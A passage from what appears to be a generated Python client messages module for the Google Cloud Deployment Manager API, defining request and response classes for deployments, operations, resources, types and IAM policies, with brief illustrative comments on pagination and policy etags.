operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
filter = _messages.StringField(2)
maxResults = _messages.IntegerField(3, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(4)
pageToken = _messages.StringField(5)
project = _messages.StringField(6, required=True)
class DeploymentmanagerOperationsGetRequest(_messages.Message):
"""A DeploymentmanagerOperationsGetRequest object.
Fields:
operation: The name of the operation for this request.
project: The project ID for this request.
"""
operation = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class DeploymentmanagerOperationsListRequest(_messages.Message):
"""A DeploymentmanagerOperationsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerResourcesGetRequest(_messages.Message):
"""A DeploymentmanagerResourcesGetRequest object.
Fields:
deployment: The name of the deployment for this request.
project: The project ID for this request.
resource: The name of the resource for this request.
"""
deployment = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
resource = _messages.StringField(3, required=True)
class DeploymentmanagerResourcesListRequest(_messages.Message):
"""A DeploymentmanagerResourcesListRequest object.
Fields:
deployment: The name of the deployment for this request.
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
deployment = _messages.StringField(1, required=True)
filter = _messages.StringField(2)
maxResults = _messages.IntegerField(3, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(4)
pageToken = _messages.StringField(5)
project = _messages.StringField(6, required=True)
class DeploymentmanagerTypeProvidersDeleteRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersDeleteRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
class DeploymentmanagerTypeProvidersGetRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersGetRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
class DeploymentmanagerTypeProvidersInsertRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersInsertRequest object.
Fields:
project: The project ID for this request.
typeProvider: A TypeProvider resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.MessageField('TypeProvider', 2)
class DeploymentmanagerTypeProvidersListRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerTypeProvidersPatchRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersPatchRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
typeProviderResource: A TypeProvider resource to be passed as the request
body.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
typeProviderResource = _messages.MessageField('TypeProvider', 3)
class DeploymentmanagerTypeProvidersUpdateRequest(_messages.Message):
"""A DeploymentmanagerTypeProvidersUpdateRequest object.
Fields:
project: The project ID for this request.
typeProvider: The name of the type provider for this request.
typeProviderResource: A TypeProvider resource to be passed as the request
body.
"""
project = _messages.StringField(1, required=True)
typeProvider = _messages.StringField(2, required=True)
typeProviderResource = _messages.MessageField('TypeProvider', 3)
class DeploymentmanagerTypesDeleteRequest(_messages.Message):
"""A DeploymentmanagerTypesDeleteRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
class DeploymentmanagerTypesGetRequest(_messages.Message):
"""A DeploymentmanagerTypesGetRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
class DeploymentmanagerTypesInsertRequest(_messages.Message):
"""A DeploymentmanagerTypesInsertRequest object.
Fields:
project: The project ID for this request.
type: A Type resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
type = _messages.MessageField('Type', 2)
class DeploymentmanagerTypesListRequest(_messages.Message):
"""A DeploymentmanagerTypesListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class DeploymentmanagerTypesPatchRequest(_messages.Message):
"""A DeploymentmanagerTypesPatchRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
typeResource: A Type resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
typeResource = _messages.MessageField('Type', 3)
class DeploymentmanagerTypesUpdateRequest(_messages.Message):
"""A DeploymentmanagerTypesUpdateRequest object.
Fields:
project: The project ID for this request.
type: The name of the type for this request.
typeResource: A Type resource to be passed as the request body.
"""
project = _messages.StringField(1, required=True)
type = _messages.StringField(2, required=True)
typeResource = _messages.MessageField('Type', 3)
class DeploymentsCancelPreviewRequest(_messages.Message):
"""DeploymentsCancelPreviewRequest message type.
Fields:
fingerprint: Specifies a fingerprint for cancelPreview() requests. A
fingerprint is a randomly generated value that must be provided in
cancelPreview() requests to perform optimistic locking. This ensures
optimistic concurrency so that the deployment does not have conflicting
requests (e.g. if someone attempts to make a new update request while
another user attempts to cancel a preview, this would prevent one of the
requests). The fingerprint is initially generated by Deployment Manager
and changes after every request to modify a deployment. To get the
latest fingerprint value, perform a get() request on the deployment.
"""
fingerprint = _messages.BytesField(1)
class DeploymentsListResponse(_messages.Message):
"""A response containing a partial list of deployments and a page token used
to build the next request if the request has been truncated.
Fields:
deployments: [Output Only] The deployments contained in this response.
nextPageToken: [Output Only] A token used to continue a truncated list
request.
"""
deployments = _messages.MessageField('Deployment', 1, repeated=True)
nextPageToken = _messages.StringField(2)
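# Illustrative sketch (not generated code): draining a truncated listing by
# following nextPageToken until the service stops returning one.  `client`
# is a hypothetical apitools client wrapper.
def _example_list_all_deployments(client, project):
  deployments = []
  page_token = None
  while True:
    response = client.deployments.List(
        DeploymentmanagerDeploymentsListRequest(project=project,
                                                pageToken=page_token))
    deployments.extend(response.deployments)
    page_token = response.nextPageToken
    if not page_token:
      return deployments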
class DeploymentsStopRequest(_messages.Message):
"""DeploymentsStopRequest message type.
Fields:
fingerprint: Specifies a fingerprint for stop() requests. A fingerprint is
a randomly generated value that must be provided in stop() requests to
perform optimistic locking. This ensures optimistic concurrency so that
the deployment does not have conflicting requests (e.g. if someone
attempts to make a new update request while another user attempts to
stop an ongoing update request, this would prevent a collision). The
fingerprint is initially generated by Deployment Manager and changes
after every request to modify a deployment. To get the latest
fingerprint value, perform a get() request on the deployment.
"""
fingerprint = _messages.BytesField(1)
class ImportFile(_messages.Message):
"""ImportFile message type.
Fields:
content: The contents of the file.
name: The name of the file.
"""
content = _messages.StringField(1)
name = _messages.StringField(2)
class InputMapping(_messages.Message):
"""InputMapping creates a 'virtual' property that will be injected into the
properties before sending the request to the underlying API.
Fields:
fieldName: The name of the field that is going to be injected.
location: The location where this mapping applies.
methodMatch: Regex to evaluate on method to decide if input applies.
value: A jsonPath expression to select an element.
"""
fieldName = _messages.StringField(1)
location = _messages.StringField(2)
methodMatch = _messages.StringField(3)
value = _messages.StringField(4)
class LogConfig(_messages.Message):
"""Specifies what kind of log the caller must write
Fields:
counter: Counter options.
"""
counter = _messages.MessageField('LogConfigCounterOptions', 1)
class LogConfigCounterOptions(_messages.Message):
"""Options for counters
Fields:
field: The field value to attribute.
metric: The metric to update.
"""
field = _messages.StringField(1)
metric = _messages.StringField(2)
class Manifest(_messages.Message):
"""Manifest message type.
Fields:
config: [Output Only] The YAML configuration for this manifest.
expandedConfig: [Output Only] The fully-expanded configuration file,
including any templates and references.
id: [Output Only] Unique identifier for the resource; defined by the
server.
imports: [Output Only] The imported files for this manifest.
insertTime: [Output Only] Timestamp when the manifest was created, in
RFC3339 text format.
layout: [Output Only] The YAML layout for this manifest.
name: [Output Only] The name of the manifest.
selfLink: [Output Only] Self link for the manifest.
"""
config = _messages.MessageField('ConfigFile', 1)
expandedConfig = _messages.StringField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
imports = _messages.MessageField('ImportFile', 4, repeated=True)
insertTime = _messages.StringField(5)
layout = _messages.StringField(6)
name = _messages.StringField(7)
selfLink = _messages.StringField(8)
class ManifestsListResponse(_messages.Message):
"""A response containing a partial list of manifests and a page token used
to build the next request if the request has been truncated.
Fields:
manifests: [Output Only] Manifests contained in this list response.
nextPageToken: [Output Only] A token used to continue a truncated list
request.
"""
manifests = _messages.MessageField('Manifest', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class Operation(_messages.Message):
"""An Operation resource, used to manage asynchronous API requests.
Messages:
ErrorValue: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
clientOperationId: [Output Only] Reserved for future use.
creationTimestamp: [Deprecated] This field is deprecated.
description: [Output Only] A textual description of the operation, which
is set when the operation is created.
endTime: [Output Only] The time that this operation was completed. This
value is in RFC3339 text format.
error: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
httpErrorMessage: [Output Only] If the operation fails, this field
contains the HTTP error message that was returned, such as NOT FOUND.
httpErrorStatusCode: [Output Only] If the operation fails, this field
contains the HTTP error status code that was returned. For example, a
404 means the resource was not found.
id: [Output Only] The unique identifier for the resource. This identifier
is defined by the server.
insertTime: [Output Only] The time that this operation was requested. This
value is in RFC3339 text format.
kind: [Output Only] Type of the resource. Always compute#operation for
Operation resources.
name: [Output Only] Name of the resource.
operationType: [Output Only] The type of operation, such as insert,
update, or delete, and so on.
progress: [Output Only] An optional progress indicator that ranges from 0
to 100. There is no requirement that this be linear or support any
granularity of operations. This should not be used to guess when the
operation will be complete. This number should monotonically increase as
the operation progresses.
region: [Output Only] The URL of the region where the operation resides.
Only available when performing regional operations.
selfLink: [Output Only] Server-defined URL for the resource.
startTime: [Output Only] The time that this operation was started by the
server. This value is in RFC3339 text format.
status: [Output Only] The status of the operation, which can be one of the
following: PENDING, RUNNING, or DONE.
statusMessage: [Output Only] An optional textual description of the
current status of the operation.
targetId: [Output Only] The unique target ID, which identifies a specific
incarnation of the target resource.
targetLink: [Output Only] The URL of the resource that the operation
modifies. For operations related to creating a snapshot, this points to
the persistent disk that the snapshot was created from.
user: [Output Only] User who requested the operation, for example:
[email protected].
warnings: [Output Only] If warning messages are generated during
processing of the operation, this field will be populated.
zone: [Output Only] The URL of the zone where the operation resides. Only
available when performing per-zone operations.
"""
class ErrorValue(_messages.Message):
"""[Output Only] If errors are generated during processing of the
operation, this field will be populated.
Messages:
ErrorsValueListEntry: A ErrorsValueListEntry object.
Fields:
errors: [Output Only] The array of errors encountered while processing
this operation.
"""
class ErrorsValueListEntry(_messages.Message):
"""A ErrorsValueListEntry object.
Fields:
code: [Output Only] The error type identifier for this error.
location: [Output Only] Indicates the field in the request that caused
the error. This property is optional.
message: [Output Only] An optional, human-readable error message.
"""
code = _messages.StringField(1)
location = _messages.StringField(2)
message = _messages.StringField(3)
errors = _messages.MessageField('ErrorsValueListEntry', 1, repeated=True)
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
clientOperationId = _messages.StringField(1)
creationTimestamp = _messages.StringField(2)
description = _messages.StringField(3)
endTime = _messages.StringField(4)
error = _messages.MessageField('ErrorValue', 5)
httpErrorMessage = _messages.StringField(6)
httpErrorStatusCode = _messages.IntegerField(7, variant=_messages.Variant.INT32)
id = _messages.IntegerField(8, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(9)
kind = _messages.StringField(10, default=u'deploymentmanager#operation')
name = _messages.StringField(11)
operationType = _messages.StringField(12)
progress = _messages.IntegerField(13, variant=_messages.Variant.INT32)
region = _messages.StringField(14)
selfLink = _messages.StringField(15)
startTime = _messages.StringField(16)
status = _messages.StringField(17)
statusMessage = _messages.StringField(18)
targetId = _messages.IntegerField(19, variant=_messages.Variant.UINT64)
targetLink = _messages.StringField(20)
user = _messages.StringField(21)
warnings = _messages.MessageField('WarningsValueListEntry', 22, repeated=True)
zone = _messages.StringField(23)
class OperationsListResponse(_messages.Message):
"""A response containing a partial list of operations and a page token used
to build the next request if the request has been truncated.
Fields:
nextPageToken: [Output Only] A token used to continue a truncated list
request.
operations: [Output Only] Operations contained in this list response.
"""
nextPageToken = _messages.StringField(1)
operations = _messages.MessageField('Operation', 2, repeated=True)
class Options(_messages.Message):
"""Options allows customized resource handling by Deployment Manager.
Fields:
inputMappings: The mappings that apply for requests.
nameProperty: The json path to the field in the resource JSON body into
which the resource name should be mapped. Leaving this empty indicates
that there should be no mapping performed.
validationOptions: Options for how to validate and process properties on a
resource.
"""
inputMappings = _messages.MessageField('InputMapping', 1, repeated=True)
nameProperty = _messages.StringField(2)
validationOptions = _messages.MessageField('ValidationOptions', 3)
class Policy(_messages.Message):
"""Defines an Identity and Access Management (IAM) policy. It is used to
specify access control policies for Cloud Platform resources. A `Policy`
consists of a list of `bindings`. A `Binding` binds a list of `members` to a
`role`, where the members can be user accounts, Google groups, Google
domains, and service accounts. A `role` is a named list of permissions
defined by IAM. **Example** { "bindings": [ { "role": "roles/owner",
"members": [ "user:[email protected]", "group:[email protected]",
"domain:google.com", "serviceAccount:my-other-
[email protected]", ] }, { "role": "roles/viewer", "members":
["user:[email protected]"] } ] } For a description of IAM and its features,
see the [IAM developer's guide](https://cloud.google.com/iam).
Fields:
auditConfigs: Specifies cloud audit logging configuration for this policy.
bindings: Associates a list of `members` to a `role`. Multiple `bindings`
must not be specified for the same `role`. `bindings` with no members
will result in an error.
etag: `etag` is used for optimistic concurrency control as a way to help
prevent simultaneous updates of a policy from overwriting each other. It
is strongly suggested that systems make use of the `etag` in the read-
modify-write cycle to perform policy updates in order to avoid race
conditions: An `etag` is returned in the response to `getIamPolicy`, and
systems are expected to put that etag in the request to `setIamPolicy`
to ensure that their change will be applied to the same version of the
policy. If no `etag` is provided in the call to `setIamPolicy`, then
the existing policy is overwritten blindly.
iamOwned:
rules: If more than one rule is specified, the rules are applied in the
following manner: - All matching LOG rules are always applied. - If any
DENY/DENY_WITH_LOG rule matches, permission is denied. Logging will be
applied if one or more matching rule requires logging. - Otherwise, if
any ALLOW/ALLOW_WITH_LOG rule matches, permission is granted. Logging
will be applied if one or more matching rule requires logging. -
Otherwise, if no rule applies, permission is denied.
version: Version of the `Policy`. The default version is 0.
"""
auditConfigs = _messages.MessageField('AuditConfig', 1, repeated=True)
bindings = _messages.MessageField('Binding', 2, repeated=True)
etag = _messages.BytesField(3)
iamOwned = _messages.BooleanField(4)
rules = _messages.MessageField('Rule', 5, repeated=True)
version = _messages.IntegerField(6, variant=_messages.Variant.INT32)
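# Illustrative read-modify-write sketch (hypothetical client calls, not part of
# this generated module): fetch the current policy, mutate it, and send the
# same etag back so a stale write is detected rather than overwriting a
# concurrent update.
#
#   policy = client.GetIamPolicy(resource='my-resource')  # Policy with etag set
#   policy.bindings.append(
#       Binding(role='roles/viewer', members=['user:[email protected]']))
#   client.SetIamPolicy(resource='my-resource', policy=policy)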
class Resource(_messages.Message):
"""Resource message type.
Messages:
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
accessControl: The Access Control Policy set on this resource.
finalProperties: [Output Only] The evaluated properties of the resource
with references expanded. Returned as serialized YAML.
id: [Output Only] Unique identifier for the resource; defined by the
server.
insertTime: [Output Only] Timestamp when the resource was created or
acquired, in RFC3339 text format .
manifest: [Output Only] URL of the manifest representing the current
configuration of this resource.
name: [Output Only] The name of the resource as it appears in the YAML
config.
properties: [Output Only] The current properties of the resource before
any references have been filled in. Returned as serialized YAML.
type: [Output Only] The type of the resource, for example
compute.v1.instance, or cloudfunctions.v1beta1.function.
update: [Output Only] If Deployment Manager is currently updating or
previewing an update to this resource, the updated configuration appears
here.
updateTime: [Output Only] Timestamp when the resource was updated, in
RFC3339 text format .
url: [Output Only] The URL of the actual resource.
warnings: [Output Only] If warning messages are generated during
processing of this resource, this field will be populated.
"""
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
accessControl = _messages.MessageField('ResourceAccessControl', 1)
finalProperties = _messages.StringField(2)
id = _messages.IntegerField(3, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(4)
manifest = _messages.StringField(5)
name = _messages.StringField(6)
properties = _messages.StringField(7)
type = _messages.StringField(8)
update = _messages.MessageField('ResourceUpdate', 9)
updateTime = _messages.StringField(10)
url = _messages.StringField(11)
warnings = _messages.MessageField('WarningsValueListEntry', 12, repeated=True)
class ResourceAccessControl(_messages.Message):
"""The access controls set on the resource.
Fields:
gcpIamPolicy: The GCP IAM Policy to set on the resource.
"""
gcpIamPolicy = _messages.StringField(1)
class ResourceUpdate(_messages.Message):
"""ResourceUpdate message type.
Messages:
ErrorValue: [Output Only] If errors are generated during update of the
resource, this field will be populated.
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
accessControl: The Access Control Policy to set on this resource after
updating the resource itself.
error: [Output Only] If errors are generated during update of the
resource, this field will be populated.
finalProperties: [Output Only] The expanded properties of the resource
with reference values expanded. Returned as serialized YAML.
intent: [Output Only] The intent of the resource: PREVIEW, UPDATE, or
CANCEL.
manifest: [Output Only] URL of the manifest representing the update
configuration of this resource.
properties: [Output Only] The set of updated properties for this resource,
before references are expanded. Returned as serialized YAML.
state: [Output Only] The state of the resource.
warnings: [Output Only] If warning messages are generated during
processing of this resource, this field will be populated.
"""
class ErrorValue(_messages.Message):
"""[Output Only] If errors are generated during update of the resource,
this field will be populated.
Messages:
ErrorsValueListEntry: A ErrorsValueListEntry object.
Fields:
errors: [Output Only] The array of errors encountered while processing
this operation.
"""
class ErrorsValueListEntry(_messages.Message):
"""A ErrorsValueListEntry object.
Fields:
code: [Output Only] The error type identifier for this error.
location: [Output Only] Indicates the field in the request that caused
the error. This property is optional.
message: [Output Only] An optional, human-readable error message.
"""
code = _messages.StringField(1)
location = _messages.StringField(2)
message = _messages.StringField(3)
errors = _messages.MessageField('ErrorsValueListEntry', 1, repeated=True)
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
accessControl = _messages.MessageField('ResourceAccessControl', 1)
error = _messages.MessageField('ErrorValue', 2)
finalProperties = _messages.StringField(3)
intent = _messages.StringField(4)
manifest = _messages.StringField(5)
properties = _messages.StringField(6)
state = _messages.StringField(7)
warnings = _messages.MessageField('WarningsValueListEntry', 8, repeated=True)
class ResourcesListResponse(_messages.Message):
"""A response containing a partial list of resources and a page token used
to build the next request if the request has been truncated.
Fields:
nextPageToken: A token used to continue a truncated list request.
resources: Resources contained in this list response.
"""
nextPageToken = _messages.StringField(1)
resources = _messages.MessageField('Resource', 2, repeated=True)
class Rule(_messages.Message):
"""A rule to be applied in a Policy.
Fields:
action: Required
conditions: Additional restrictions that must be met
description: Human-readable description of the rule.
ins: If one or more 'in' clauses are specified, the rule matches if the
PRINCIPAL/AUTHORITY_SELECTOR is in at least one of these entries.
logConfigs: The config returned to callers of tech.iam.IAM.CheckPolicy for
any entries that match the LOG action.
notIns: If one or more 'not_in' clauses are specified, the rule matches if
the PRINCIPAL/AUTHORITY_SELECTOR is in none of the entries.
    permissions: A permission is a string of the form
      '<service>.<resource type>.<verb>' (e.g., 'storage.buckets.list'). A
      value of '*' matches all permissions, and a verb part of '*' (e.g.,
      'storage.buckets.*') matches all verbs.
"""
action = _messages.StringField(1)
conditions = _messages.MessageField('Condition', 2, repeated=True)
description = _messages.StringField(3)
ins = _messages.StringField(4, repeated=True)
logConfigs = _messages.MessageField('LogConfig', 5, repeated=True)
notIns = _messages.StringField(6, repeated=True)
permissions = _messages.StringField(7, repeated=True)
class StandardQueryParameters(_messages.Message):
"""Query parameters accepted by all methods.
Enums:
AltValueValuesEnum: Data format for the response.
Fields:
alt: Data format for the response.
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters. Overrides userIp if both are provided.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
userIp: IP address of the site where the request originates. Use this if
you want to enforce per-user limits.
"""
class AltValueValuesEnum(_messages.Enum):
"""Data format for the response.
Values:
json: Responses with Content-Type of application/json
"""
json = 0
alt = _messages.EnumField('AltValueValuesEnum', 1, default=u'json')
fields = _messages.StringField(2)
key = _messages.StringField(3)
oauth_token = _messages.StringField(4)
prettyPrint = _messages.BooleanField(5, default=True)
quotaUser = _messages.StringField(6)
trace = _messages.StringField(7)
userIp = _messages.StringField(8)
class TargetConfiguration(_messages.Message):
"""TargetConfiguration message type.
Fields:
config: The configuration to use for this deployment.
imports: Specifies any files to import for this configuration. This can be
used to import templates or other files. For example, you might import a
text file in order to use the file in a template.
"""
